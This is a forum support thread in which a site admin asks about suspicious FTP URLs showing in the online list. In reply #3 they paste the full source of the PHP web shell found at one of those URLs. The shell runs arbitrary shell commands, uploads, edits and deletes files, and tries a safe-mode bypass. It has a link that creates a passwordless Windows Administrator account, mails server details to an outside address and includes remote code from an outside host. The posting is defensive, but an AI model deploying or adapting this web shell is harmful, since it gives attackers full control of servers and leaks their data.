Advertisement:

Author Topic: Hacking attempt?  (Read 659 times)

Offline SMiFFER

  • Jr. Member
  • **
  • Posts: 371
Hacking attempt?
« on: December 06, 2017, 02:52:13 PM »
Just coincidently, I looked into who is online and saw a guest showing as his action (!):
"viewing ftp://altriatec:altriatec@altriatec.com/index.php?"

Very odd you may say? Yes, very odd - I do not even know that domain...

...coming from VB, using SMF since 2012, now hosting it myself, currently SMF 2.0.15 on PHP 5.6.32
QUOTE OF Aleksi "Lex" Kilpinen: "That version is old enough to go to school itself."

Offline SMiFFER

  • Jr. Member
  • **
  • Posts: 371
Re: Hacking attempt?
« Reply #1 on: December 10, 2017, 04:51:31 PM »
Anyone?

Anyone else ever seen such entry?
...coming from VB, using SMF since 2012, now hosting it myself, currently SMF 2.0.15 on PHP 5.6.32
QUOTE OF Aleksi "Lex" Kilpinen: "That version is old enough to go to school itself."

Online vbgamer45

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 20,476
    • smfhacks on Facebook
    • VBGAMER45 on GitHub
    • @createaforum on Twitter
    • SMF For Free
Re: Hacking attempt?
« Reply #2 on: December 10, 2017, 04:56:39 PM »
Yes I see them often. Safe to ignore.
Community Suite for SMF - Take your forum to the next level built for SMF, Gallery,Store,Classifieds,Downloads,more!

SMFHacks.com -  Paid Modifications for SMF

Mods:
EzPortal - Portal System for SMF
SMF Gallery Pro
SMF Store SMF Classifieds Ad Seller Pro

Offline SMiFFER

  • Jr. Member
  • **
  • Posts: 371
Re: Hacking attempt?
« Reply #3 on: February 16, 2018, 08:05:27 AM »
Really?
The linked address points to this script! And it seems to create a user called "Admin" with no password??????

Code: [Select]
?<head>
<meta http-equiv="Content-Language" content="pt-br">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="AoD">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>By Scra3zy > AoD > CMD > File List</title>
<style type="text/css">
A:link {text-decoration:none}
A:visited {text-decoration:none}
A:hover {text-decoration:underline}
A:active {text-decoration:underline}
body,td {
font-family: verdana;
font-size: 8pt;
background-color: #FFCC00;
}
a{
color: #0000FF;
text-decoration: none;
}
a:hover {
color: #FF0000;
text-decoration: underline;
}
</style>
</head>
<body >
<center><h2>..:: By.Scra3zy ::..</h2></center>
<?php
 
 
@set_time_limit(0);

 
$string $_SERVER['QUERY_STRING'];
 
$mhost 'x';
 
$host_all explode("$mhost"$string);
 
$s1 $host_all[0];
 
$fstring $_SERVER['PHP_SELF']."?".$s1.$mhost;

 
$OS = @PHP_OS;
 
$IpServer '127.0.0.1';
 
$UNAME = @php_uname();
 
$PHPv = @phpversion();
 
$SafeMode = @ini_get('safe_mode');

 if (
$SafeMode == '') { $SafeMode "<i>OFF</i>"; }
 else { 
$SafeMode "<i>$SafeMode</i>"; }

 
$btname 'backtool.txt';
 
$bt 'http://www.full-comandos.com/jobing/r0nin';
 
$dc 'http://www.full-comandos.com/jobing/dc.txt';
 
$newuser '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup 


&quot;Administrators&quot; /add Admin;net localgroup &quot;Users&quot; /del Admin'
;
 
$bn 'http://www.BY-SCR43Z1.com/download/cmd.do'
// Java Script
 
echo "<script type=\"text/javascript\">";

 echo 
"function ChMod(chdir, file) {";
 echo 
"var o = prompt('Chmod: - Contoh: 0777', '');";
 echo 
"if (o) {";
 echo 
"window.location=\"\" + '{$fstring}&action=chmod&chdir=' + chdir + '&file=' + file + 

'&chmod=' + o + \"\";"
;
 echo 
"}";
 echo 
"}";
 echo 
"function Rename(chdir, file, mode) {";
 echo 
"if (mode == 'edit') {";
 echo 
"var o = prompt('Ganti Nama File '+ file + ' menjadi:', '');";
 echo 
"}";
 echo 
"else {";
 echo 
"var o = prompt('Ganti Nama Folder '+ file + ' menjadi:', '');";
 echo 
"}";
 echo 
"if (o) {";
 echo 
"window.location=\"\" + '{$fstring}&action=rename&chdir=' + chdir + '&file=' + file + 

'&newname=' + o + '&mode=' + mode +\"\";"
;
 echo 
"}";
 echo 
"}";
 echo 
"function Copy(chdir, file) {";
 echo 
"var o = prompt('Copied for:', '/tmp/' + file);";
 echo 
"if (o) {";
 echo 
"window.location=\"\" + '{$fstring}&action=copy&chdir=' + chdir + '&file=' + file + 

'&fcopy=' + o + \"\";"
;
 echo 
"}";
 echo 
"}";
 echo 
"function Mkdir(chdir) {";
 echo 
"var o = prompt('Nama Folder?', 'Folder_Baru');";
 echo 
"if (o) {";
 echo 
"window.location=\"\" + '{$fstring}&action=mkdir&chdir=' + chdir + '&newdir=' + o + 

\"\";"
;
 echo 
"}";
 echo 
"}";
 echo 
"function Newfile(chdir) {";
 echo 
"var o = prompt('Nama File?', 'File_Baru.txt');";
 echo 
"if (o) {";
 echo 
"window.location=\"\" + '{$fstring}&action=newfile&chdir=' + chdir + '&newfile=' + o + 

\"\";"
;
 echo 
"}";
 echo 
"}";
 echo 
"</script>";

 
// End JavaScript

/* Functions */
function cmd($CMDs) {
$CMD[1] = '';
exec($CMDs$CMD[1]);
if (empty($CMD[1])) {
$CMD[1] = shell_exec($CMDs);
}
elseif (empty($CMD[1])) {
$CMD[1] = passthru($CMDs);
}
elseif (empty($CMD[1])) {
$CMD[1] = system($CMDs);
}
elseif (empty($CMD[1])) {
$handle popen($CMDs'r');
while(!feof($handle)) {
$CMD[1][] .= fgets($handle);
}
pclose($handle);
}
return $CMD[1];
}
 
if (@
$_GET['chdir']) {
 
$chdir $_GET['chdir']; 
} else {
   
$chdir getcwd()."/";
  }
if (@
chdir("$chdir")) {
 
$msg "<font color=\"#008000\"> Pintu Masuk ke Direktori, OK!</font>";
} else {
 
$msg "<font color=\"#FF0000\">Error: Gagal memasukkan ke folder!</font>";
 
$chdir str_replace($SCRIPT_NAME""$_SERVER['SCRIPT_NAME']);
}
 
$chdir str_replace(chr(92), chr(47), $chdir);

if (@
$_GET['action'] == 'upload') {
 
$uploaddir $chdir;
 
$uploadfile $uploaddir$_FILES['userfile']['name'];
 if (@
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir 

$_FILES['userfile']['name'])) {
  
$msg "<font color=\"#008000\"><font 

color=\"#000080\">
{$_FILES['userfile']['name']}</font>, arsip valid, sukses dimuat. 

</font>"
;
 } else {
    
$msg "<font color=\"#FF0000\">Error: gagal menyalin arsip.</font>";
   }
}
elseif (@
$_GET['action'] == 'mkdir') {
    
$newdir $_GET['newdir'];
    if (@
mkdir("$chdir"."$newdir")) {
     
$msg "<font color=\"#008000\"><font color=\"#000080\">{$newdir}</font>, folder 

berhasil dibuat. </font>"
;
    } else {
       
$msg "<font color=\"#FF0000\">Error: Pembuatan folder gagal.</font>";
      }
}
elseif (@
$_GET['action'] == 'newfile') {
    
$newfile $_GET['newfile'];
    if (@
touch("$chdir"."$newfile")) {
     
$msg "<font color=\"#008000\"><font color=\"#000080\">{$newfile}</font>, berhasil 

dibuat! </font>"
;
    } else {
       
$msg "<font color=\"#FF0000\">Error: Pembuatan arsip gagal!</font>";
      }
}

elseif (@
$_GET['action'] == 'del') {
     
$file $_GET['file']; $type $_GET['type'];
     if (
$type == 'file') {
      if (@
unlink("$chdir"."$file")) {
       
$msg "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>, Berhasil 

menghapus arsip (file)!</font>"
;
      } else {
         
$msg "<font color=\"#FF0000\">Error: Gagal menghapus arsip (file)!</font>";
        }
     } elseif (
$type == 'dir') {
        if (@
rmdir("$chdir"."$file")) {
          
$msg "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>, Berhasil 

menghapus folder!</font>"
;
        } else {
           
$msg "<font color=\"#FF0000\">Error: Gagal menghapus folder!</font>";
          }
       }
}
elseif (@
$_GET['action'] == 'chmod') {
     
$file $chdir.$_GET['file']; $chmod $_GET['chmod'];
     if (@
chmod ("$file"$chmod)) {
  
      
$msg "<font color=\"#008000\">Chmod dari</font> <font 

color=\"#000080\">
{$_GET['file']}</font> <font color=\"#008000\">berubah menjadi</font> 


<font color=\"#000080\">
$chmod</font> <font color=\"#008000\">: Sukses!</font>";
     } else {
        
$msg '<font color=\"#FF0000\">Error: Gagal mengubah chmod.</font>';
       }
}
elseif (@
$_GET['action'] == 'rename') {
     
$file $_GET['file']; $newname $_GET['newname'];
     if (@
rename("$chdir"."$file""$chdir"."$newname")) {
      
$msg "<font color=\"#008000\">Archive</font> <font color=\"#000080\">{$file}</font> 

<font color=\"#008000\">named for</font> <font color=\"#000080\">
{$newname}</font> <font 

color=\"#008000\">successfully!</font>"
;
     } else {
        
$msg "<font color=\"#FF0000\">Error: Gagal mencalonkan arsip.</font>";
       }
}
elseif (@
$_GET['action'] == 'copy') {
    
$file $chdir.$_GET['file']; $copy $_GET['fcopy'];
    if (@
copy("$file""$copy")) {
     
$msg "<font color=\"#000080\">{$file}</font>, <font color=\"#008000\">disalin 

menjadi</font> <font color=\"#000080\">
{$copy}</font> <font color=\"#008000\"> 


Berhasil!</font>"
;
    } else {
       
$msg "<font color=\"#FF0000\">Error: Gagal menyalin </font> <font 

color=\"#000000\">
{$file}</font> <font color=\"#FF0000\">menjadi</font> <font 

color=\"#000000\">
{$copy}</font></font>";
      }
}
/* Parte Atualiza 02:48 12/2/2006 */

elseif (@$_GET['action'] == 'cmd') {
if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }
$cmd stripslashes(trim($cmd));
$result_arr cmd($cmd);

$afim count($result_arr); $acom 0$msg '';
$msg .= "<p style=\"color: #000000;text-align: center;font-family: 'Lucida 

Console';font-size: 12px;margin 2\">Hasil : <b>"
.$cmd."</b></p>";
if ($result_arr) {
while ($acom <= $afim) {
$msg .= "<p style=\"color: #008000;text-align: left;font-family: 

'Lucida Console';font-size: 12px;margin 2\"> "
.@$result_arr[$acom]."</p>";
$acom++;
 
}
}
else {
$msg .= "<p style=\"color: #FF0000;text-align: center;font-family: 'Lucida 

Console';font-size: 12px;margin 2\">Error: Gagal mengeksekusi perintah.</p>"
;
}
}
elseif (@
$_GET['action'] == 'safemode') {
if (@!
extension_loaded('shmop')) {
 echo 
"Loading... module</br>";

    if (
strtoupper(substr(PHP_OS0,3) == 'WIN')) {
        @
dl('php_shmop.dll');
    } else {
        @
dl('shmop.so');
    }
}

if (@
extension_loaded('shmop')) {
 echo 
"Module: <b>shmop</b> loaded!</br>";

 
$shm_id = @shmop_open(0xff2"c"0644100);
 if (!
$shm_id) { echo "Couldn't create shared memory segment\n"; }
 
$data="\x00";
 
$offset=-3842685;
 
$shm_bytes_written = @shmop_write($shm_id$data$offset);
 if (
$shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of 

data\n"
; }
 if (!
shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; }
 echo 
passthru("id"); 
 
shmop_close($shm_id);


} else { echo 
"Module: <b>shmop</b> tidak dimuat!</br>"; }
}

elseif (@
$_GET['action'] == 'zipen') {
 
$file $_GET['file'];
 
$zip = @zip_open("$chdir"."$file");
 
$msg '';
if (
$zip) {

    while (
$zip_entry zip_read($zip)) {
        
$msg .= "Name:               " zip_entry_name($zip_entry) . "\n";
        
$msg .= "Actual Filesize:    " zip_entry_filesize($zip_entry) . "\n";
        
$msg .= "Compressed Size:    " zip_entry_compressedsize($zip_entry) . "\n";
        
$msg .= "Compression Method: " zip_entry_compressionmethod($zip_entry) . "\n";

        if (
zip_entry_open($zip$zip_entry"r")) {
            echo 
"File Contents:\n";
            
$buf zip_entry_read($zip_entryzip_entry_filesize($zip_entry));
            echo 
"$buf\n";

            
zip_entry_close($zip_entry);
        }
        echo 
"\n";

    }

    
zip_close($zip);

}
}
elseif (@
$_GET['action'] == 'edit') {
 
$file $_GET['file'];
 
$conteudo '';
 
$filename "$chdir"."$file";
 
$conteudo = @file_get_contents($filename);
 
$conteudo htmlspecialchars($conteudo);
 
$back $_SERVER['HTTP_REFERER'];
 echo 
"<p align=\"center\">Editing {$file} ...</p>";
 echo 
"<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: 

collapse\" width=\"100%\" id=\"editacao\">"
;
 echo 
"<tr>";
 echo 
"<td width=\"100%\">";
 echo 
"<form method=\"POST\" 

action=\"
{$fstring}&amp;action=save&amp;chdir={$chdir}&amp;file={$file}\">";
 echo 
"<!--webbot bot=\"SaveResults\" u-file=\"_private/form_results.csv\" 

s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><p align=\"center\">"
;
 print 
"<textarea rows=\"18\" name=\"S1\" cols=\"89\" style=\"font-family: Verdana; 

font-size: 8pt; border: 1px solid #000000\">
{$conteudo}</textarea></p>";
 echo 
"<p align=\"center\">";
 echo 
"<input type=\"submit\" value=\"Simpan\" name=\"B2\" style=\"  border: 1px solid 

#000000\"> "
;
 echo 
"<input type=\"button\" value=\"Tutup\" 

Onclick=\"javascript:window.location='
{$fstring}&amp;chdir={$chdir}'\" name=\"B1\" style=\"  

border: 1px solid #000000\"> "
;
 echo 
"</form>";
 echo 
"</td>";
 echo 
"</tr>";
 echo 
"</table>";
}
elseif (@
$_GET['action'] == 'save') {
   
$filename "$chdir".$_GET['file'];
   
$somecontent $_POST['S1'];
   
$somecontent stripslashes(trim($somecontent));
   if (
is_writable($filename)) {
    @
$handle fopen ($filename"w");
    @
$fw fwrite($handle$somecontent);
    @
fclose($handle);
    if (
$handle && $fw) {
     
$msg "<font color=\"#000080\">{$_GET['file']}</font>, <font 

color=\"#008000\">berhasil diedit!</font>"
;
    }
 } else {
    
$msg "<font color=\"#000000\">{$_GET['file']},</font> <font color=\"#FF0000\">tidak 

bisa ditulisi!</font>"
;
   }
}

// Informa???�????s
 
$cmdget '';
 if (!empty(
$_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
 if (!empty(
$_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
 
$cmdget htmlspecialchars($cmdget);
 function 
asdads() {
  
$asdads '';
  if (@
file_exists("/usr/bin/wget")) { $asdads .= "wget "; }
  if (@
file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; }
  if (@
file_exists("/usr/bin/curl")) { $asdads .= "curl "; }
  if (@
file_exists("/usr/bin/GET")) { $asdads .= "GET "; }
  if (@
file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; }
  return 
$asdads;
 }

echo 
"<form method=\"POST\" name=\"cmd\" 

action=\"
{$fstring}&amp;action=cmd&amp;chdir=$chdir\">";
echo 
"<fieldset style=\"border: 1px solid #000000; padding: 2\">";
echo 
"<legend>Informasi</legend>";
echo 
"<br><table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: 

collapse; font-family: Verdana; font-size: 10px\" width=\"100%\">"
;
echo 
"<tr>";
echo 
"<td width=\"8%\">";
echo 
" <b>Sistem </b> </td> ";
echo 
"<td width=\"92%\">: {$OS}</td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td width=\"8%\">";
echo 
" <b>Nama </b></td> ";
echo 
"<td width=\"92%\">: {$UNAME}</td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td width=\"8%\">";
echo 
" <b>PHP </b></td> ";
echo 
"<td width=\"92%\">: {$PHPv}, <b> Safe Mode :</b> {$SafeMode}</td>";
echo 
"</tr>";
 if (
strtoupper(substr($OS0,3) != 'WIN')) {
  
$Methods asdads();
  if (
$Methods == '') { $Methods "???"; }
  echo 
"<tr>";
  echo 
"<td width=\"8%\">";
  echo 
"<b>Methods </b></td> ";
  echo 
"<td width=\"92%\">: {$Methods}</td>";
  echo 
"</tr>";
 }

echo 
"<tr>";
echo 
"<td width=\"8%\">";
echo 
" <b>IP </b></td> ";
echo 
"<td width=\"92%\">: {$IpServer}</td>";
echo 
"</tr>";
echo 
"<tr>";
echo 
"<td width=\"8%\">";
echo 
" <b>Perintah </b></td> ";
echo 
"<td width=\"92%\">: <input type=\"text\" size=\"70\" name=\"cmd\" value=\"{$cmdget}\" 

style=\" font-size: 8 pt; border: 1px solid #000000\"> <input type=\"submit\" 

name=\"action\" value=\"Kirim\" style=\" font-size: 8 pt; border: 1px solid 

#000000\"></td>"
;
echo 
"</tr>";
echo 
"</table><br>";
echo 
"</fieldset></form>";
// Dir

echo "<form method=\"POST\" action=\"{$fstring}&amp;action=upload&amp;chdir=$chdir\" 

enctype=\"multipart/form-data\">"
;
echo 
"<!--webbot bot=\"FileUpload\" u-file=\"_private/form_results.csv\" 

s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><fieldset style=\"border: 1px solid 

#000000; padding: 2\">"
;
if (
is_writable("$chdir")) {
 if (
strtoupper(substr($OS0,3) == 'WIN')) {
  echo 
"<legend>Dir <b>YES</b>: {$chdir} - <a href=\"#[New Dir]\" 

onclick=\"Mkdir('
{$chdir}');\">Folder Baru</a> | <a href=\"#[New File]\" 

onclick=\"Newfile('
{$chdir}')\">File Baru</a> | <a 

href=\"
{$fstring}&amp;action=cmd&amp;chdir={$chdir}&amp;cmd=$newuser\">Remote 

Access</a></legend>"
;
 } else {
    echo 
"<legend>Dir <b>YES</b>: {$chdir} - <a href=\"#[New Dir]\" 

onclick=\"Mkdir('
{$chdir}');\">Folder Baru</a> | <a href=\"#[New File]\" 

onclick=\"Newfile('
{$chdir}')\">File Baru</a> | <a 

href=\"
{$fstring}&amp;action=backtool&amp;chdir={$chdir}&amp;write=yes\">Kembali</a></legend

>"
;
   } 
}
else {
if (
strtoupper(substr($OS0,3) == 'WIN')) {
  echo 
"<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\" 

onclick=\"Mkdir('
{$chdir}');\">Foldr Baru</a> | <a href=\"#[New File]\" 

onclick=\"Newfile('
{$chdir}')\">File Baru</a> | <a 

href=\"
{$fstring}&amp;action=cmd&amp;chdir={$chdir}&amp;cmd={$newuser}\">Remote 

Access</a></legend>"
;
 } else {
    echo 
"<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\" 

onclick=\"Mkdir('
{$chdir}');\">Folder Baru</a> | <a href=\"#[New File]\" 

onclick=\"Newfile('
{$chdir}')\">File Baru</a> | <a 

href=\"
{$fstring}&amp;action=backtool&amp;chdir={$chdir}&amp;write=no\">Kembali</a></legend>

"
;
   } 
}

if (@!
$handle opendir("$chdir")) {
 echo 
" Gue gak bisa masuk folder, <a href=\"{$fstring}\">Klik sini!</a> untuk embali ke 

folder ori!</br>"
;
}
else {
echo 
"  <table border=\"0\" cellpadding=\"5\" cellspacing=\"0\" width=\"100%\">";
echo 
"    <tr>";
echo 
"      <td width=\"100%\" colspan=\"4\"> Upload:";
echo 
"      <input type=\"file\" name=\"userfile\" size=\"65\" style=\"  border-style: 

solid; border-width: 1\">"
;
echo 
"      <input type=\"submit\" value=\"Kirim\" name=\"B1\" style=\" border: 1px solid 

#000000\"></td>"
;
echo 
"    </tr>";
echo 
"    <tr>";
echo 
"      <td width=\"100%\" colspan=\"4\"> </td>";
echo 
"    </tr>";
echo 
"    <tr>";
echo 
"      <td width=\"100%\" colspan=\"4\">";
if (@!
$msg) {
 echo 
"      <p align=\"left\">Messages</td>";
} else {
   echo 
"      <p align=\"left\">$msg</td>";
  }
echo 
"    </tr>";
echo 
"    <tr>";
echo 
"      <td width=\"100%\" colspan=\"4\"> </td>";
echo 
"    </tr></table> ";
echo 
"   <table border=\"1\" cellpadding=\"2\" cellspacing=\"0\" width=\"100%\">";
echo 
"    <tr bgcolor=\"#FF6600\" align=\"center\"> ";
echo 
"      <td > Permision</td>";
echo 
"      <td > Nama File </td>";
echo 
"      <td > Kapasitas </td>";
echo 
"      <td > Perintah</td>";
echo 
"     </tr>";
$colorn 0;
    while (
false !== ($file readdir($handle))) {
        if (
$file != '.') {
            if (
$colorn == 0) {
             
$color "style=\"background-color: #FF9900\"";
            }
            elseif (
$colorn == 1) {
             
$color "style=\"background-color:  #FFCC33\"";
            }        
            if (@
is_dir("$chdir"."$file")) {
             
$file $file.'/';
             
$mode 'chdir';
            } else { 
               
$mode 'edit'
             }
            if (@
substr("$chdir"strlen($chdir) -11) != '/') {
              
$chdir .= '/';
            }
            if (
$file == '../') {
             
$lenpath strlen($chdir); $baras 0;
             for (
$i 0;$i $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } }
             
$chdir_ explode("/"$chdir);
             
$chdirpox str_replace($chdir_[$baras-1].'/'""$chdir);
            }
            
$perms = @fileperms ("$chdir"."$file");
            if (
$perms == '') {
             
$perms '???';
            }
            
$size = @filesize ("$chdir"."$file"); 
            
$size $size 1024;
            
$size explode("."$size);
            if (@
$size[1] != '') {
             
$size $size[0].'.'.@substr("$size[1]"02);
            } else {
               
$size $size[0];
             }
            if (
$size == 0) {
             if (
$mode == 'chdir') {
              
$size '???';
             }
            }
            echo 
"<tr>";
    echo "<td align=\"center\" $color$perms</td>";
            if (@
is_writable ("$chdir"."$file")) {
             if (
$mode == 'chdir') {
              if (
$file == '../') {
               echo 
"<td $color> <b><a href=\"{$fstring}&amp;chdir=$chdirpox\"><font 

color=\"#008000\">
$file</font></a></b> </td>";
              } else {
                 echo 
"<td $color> <b><a href=\"{$fstring}&amp;chdir={$chdir}{$file}\"><font 

color=\"#008000\">
$file</font></a> </b></td>";                
                }
             } else {
if (is_readable("$chdir"."$file")) {
                 echo 
"<td $color> <a 

href=\"
{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file\">$file</a> </td>";
                } else {
                   echo 
"<td $color$file </td>";
                  }
               }
            } 
           else {
             if (
$mode == 'chdir') {
              if (
$file == '../') {
               echo 
"<td $color> <a href=\"{$fstring}&amp;chdir=$chdirpox\">$file</a> 


</td>"
;
              } else {
                 echo 
"<td $color> <a 

href=\"
{$fstring}&amp;chdir={$chdir}{$file}\">$file</a></td>";                
               }
             } else {
if (@is_readable("$chdir"."$file")) {
                 echo 
"<td  $color> <a 

href=\"
{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file\">$file</a> </td>";
                } else {
                   echo 
"<td $color$file</td>";
                 }
               }
             }
            echo 
"<td align=\"right\" $color$size KB</td>";
            if (
$mode == 'edit') {
             echo 
"<td align=\"center\" $color> <a href=\"#{$file}\" 

onclick=\"Rename('
{$chdir}', '{$file}', '{$mode}')\">Rename</a> | <a 

href=\"
{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=file\">Del</a> 


| <a href=\"#
{$file}\" onclick=\"ChMod('$chdir', '$file')\">Chmod</a> | <a href=\"#{$file}\" 

onclick=\"Copy('
{$chdir}', '{$file}')\">Copy</a> </td>";
            } else {
               echo 
"<td align=\"center\" $color> <a href=\"#{$file}\" 

onclick=\"Rename('
{$chdir}', '{$file}', '{$mode}')\">Rename</a> | <a 

href=\"
{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=dir\">Del</a> 

| <a href=\"#
{$file}\" onclick=\"ChMod('$chdir', '$file')\">Chmod</a> | Copy </td>";
              }   
            echo 
"</tr>";
            if (
$colorn == 0) {
             
$colorn 1;
            }
            elseif (
$colorn == 1) {
             
$colorn 0;
            }
        }
    }
    
closedir($handle);
}

  
$OS = @PHP_OS;
  
$UNAME = @php_uname();
  
$PHPv = @phpversion();
  
$SafeMode = @ini_get('safe_mode');
  
  if (
$SafeMode == '') { $SafeMode "<i>OFF</i><BR>"; }
  else { 
$SafeMode "<i>$SafeMode</i><BR>"; }
  
   
  
$injek=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);

  
$psn=("OS = " $OS "<BR>UNAME = " $UNAME "<BR>PHPVersion = " $PHPv "<BR>Safe 

Mode = " 
$SafeMode "<BR><font color=blue>http://" $injek "</font><BR>Ingat jangan 

pakai Injek Ini.<BR>By: BY-SCR43Z1"
);
  
  
$header "From: $_SERVER[SERVER_ADMIN] <$from>\r\nReply-To: $replyto\r\n";
  
$header .= "MIME-Version: 1.0\r\n";
  If (
$file_name$header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
  If (
$file_name$header .= "--$uid\r\n";
  
$header .= "Content-Type: text/$contenttype\r\n";
  
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
  
$header .= "$message\r\n";
  If (
$file_name$header .= "--$uid\r\n";
  If (
$file_name$header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
  If (
$file_name$header .= "Content-Transfer-Encoding: base64\r\n";
  If (
$file_name$header .= "Content-Disposition: attachment; 

filename=\"
$file_name\"\r\n\r\n";
  If (
$file_name$header .= "$content\r\n";
  If (
$file_name$header .= "--$uid--";
  
$to = ("
  info1000grau@gmail.com
  
  "
);
  
$subject = ("scan bos");
  
mail($to,$subject,$psn,$header);

@include 
"$bn";
?>

  </table>

  </fieldset></form>
</div>
</body>

</html>


<html>
<img src="http://uv.terra.com.br/UV?c=planeta" width=1 height=1 border=0 alt="" align="left">
</html>


<html>
<img src="http://uv.terra.com.br/UV?c=planeta" width=1 height=1 border=0 alt="" align="left">
</html>

<html>
<img src="http://uv.terra.com.br/UV?c=planeta" width=1 height=1 border=0 alt="" align="left">
</html>
...coming from VB, using SMF since 2012, now hosting it myself, currently SMF 2.0.15 on PHP 5.6.32
QUOTE OF Aleksi "Lex" Kilpinen: "That version is old enough to go to school itself."

Offline Kindred

  • The Mean One
  • Support Specialist
  • SMF Legend
  • *
  • Posts: 57,100
  • Gender: Male
    • Kindred-999 on GitHub
Re: Hacking attempt?
« Reply #4 on: February 16, 2018, 01:44:25 PM »
did it ACTUALLY create a user in your database?
Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

Offline Illori

  • Project Manager
  • SMF Master
  • *
  • Posts: 49,848
Re: Hacking attempt?
« Reply #5 on: February 16, 2018, 01:49:06 PM »
and if so, how do you know it was from this message you received?

Offline SMiFFER

  • Jr. Member
  • **
  • Posts: 371
Re: Hacking attempt?
« Reply #6 on: May 23, 2018, 12:58:13 PM »
Just now it is...

Viewing the ftp://securedcode-001:ab102030@ftp-eu.site4now.net/site1/of.php?


Is somebody possibly exploiting a security hole in SMF? This looks really odd!
...coming from VB, using SMF since 2012, now hosting it myself, currently SMF 2.0.15 on PHP 5.6.32
QUOTE OF Aleksi "Lex" Kilpinen: "That version is old enough to go to school itself."

Online vbgamer45

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 20,476
    • smfhacks on Facebook
    • VBGAMER45 on GitHub
    • @createaforum on Twitter
    • SMF For Free
Re: Hacking attempt?
« Reply #7 on: May 23, 2018, 01:08:54 PM »
No just a bot.
Community Suite for SMF - Take your forum to the next level built for SMF, Gallery,Store,Classifieds,Downloads,more!

SMFHacks.com -  Paid Modifications for SMF

Mods:
EzPortal - Portal System for SMF
SMF Gallery Pro
SMF Store SMF Classifieds Ad Seller Pro